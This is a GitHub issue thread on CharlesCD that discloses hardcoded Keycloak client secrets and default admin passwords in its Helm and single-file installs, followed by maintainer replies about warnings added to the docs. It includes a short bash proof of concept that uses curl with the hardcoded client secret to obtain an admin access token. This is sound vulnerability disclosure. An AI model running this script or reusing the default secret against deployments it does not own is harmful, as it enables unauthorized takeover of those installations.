### ISSUE TITLE
Default installation can lead to application takeover due to hardcoded Keycloak configuration and other secrets/passwords

### ISSUE THREAD

**Issue by jonasulianazup** [ZupIT/charlescd#875]
Due to the [recommended installation types](https://docs.charlescd.io/get-started/installing-charles#next-steps), which can be followed by several Charles users in productive environments, indicating to be performed through the "[Single File](https://docs.charlescd.io/get-started/installing-charles/installing-via-single-file)" modality, and even via [Helm](https://docs.charlescd.io/get-started/installing-charles/installing-via-helm), can lead to the compromise of the instance by a malicious actor.

In addition to the secrets and passwords referenced in the configuration file, several others do not receive due attention in the Charles documentation, highlighting the risks of exposing, even if momentarily, any Charles installation on the internet.

Due to the configuration of Charles' default accounts in Keycloak, they do not receive changes to their secrets:

https://github.com/ZupIT/charlescd/blob/f93874aeb565a95efbe8bd6e62c0fc74d80d5c3d/install/helm-chart/single-file.yaml#L1-L6

It is possible to use the account corresponding to the `client_id` _realm-charlescd_, and thus obtain administrative access to any account corresponding to that realm, as well as to change the password of the default administrative user of the `charlesadmin@admin` application:

```sh
#!/usr/bin/env bash

if [ -z "$1" ]; then
    echo "[!] You must provide Keycloak address!"
    exit 1
fi

# Constants for reaching Keycloak authentication
REALM="charlescd"
CLIENT_ID="realm-charlescd"
SECRET="a79e9316-2196-41d1-8dfe-98cc48241fe3"

RAW_TOKEN=$(
curl -k -L -X POST "$1/auth/realms/$REALM/protocol/openid-connect/token" \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode "client_id=$CLIENT_ID" \
    --data-urlencode "grant_type=client_credentials" \
    --data-urlencode "client_secret=$SECRET" 2>/dev/null
)

TOKEN=$(echo "$RAW_TOKEN" | jq -r ".access_token")
echo "$TOKEN"

```

For purposes of example, the [attached script](https://github.com/ZupIT/charlescd/files/5921143/example.zip) exemplifies one of the possibilities of abuse of credentials in Keycloak.

Therefore, it is recommended that all secrets and passwords corresponding to Charles, except for the development environment, should be created dynamically, and in a way that respects the [best practices](https://pages.nist.gov/800-63-3/sp800-63b.html) for this.

Also that in the documentation, that the risk of using any of these standard credentials, is better notified to the user who chooses to install both via _Helm_ and _"Single File"_.

An official installation script for this, or some formula using [Ritchie](https://github.com/ZupIT/ritchie-cli/), can solve this problem seeding these values with a unique and secure one.

**Comment by celiofilhozup** [comment]
Thanks for reporting, we'll analyze now and find best approach to fix!

**Comment by jonasulianazup** [comment]
@celiofilhozup , for we did not lose the tracking about this issue, I see a lot of modifications in installation steps and Charles in general, is this problem fixed in the current version?

**Comment by celiofilhozup** [comment]
Hi @jonasulianazup,
Until now as keycloak uses pbkdf2-sha256 hash algorithm on it's passwords we can't generate them dynamically using helm; so we choose to update our docs warning for default user and password on keycloak (in progress), and also we added on helm NOTES.txt (https://github.com/ZupIT/charlescd/blob/main/install/helm-chart/templates/NOTES.txt#L3-L6) an explicit warning to user linking direct to keycloak url to change it right after installing/upgrading. 
It's already present on current release 0.6.1

**Comment by fandrade-zup** [comment]
In CharlesCD Documentation, we have a warning about passwords to change after install CharlesCD. We warning about keycloak user and password and charlesadmin@admin password.

Instructions on https://docs.charlescd.io/get-started/installing-charles/installing-via-helm#change-default-passwords
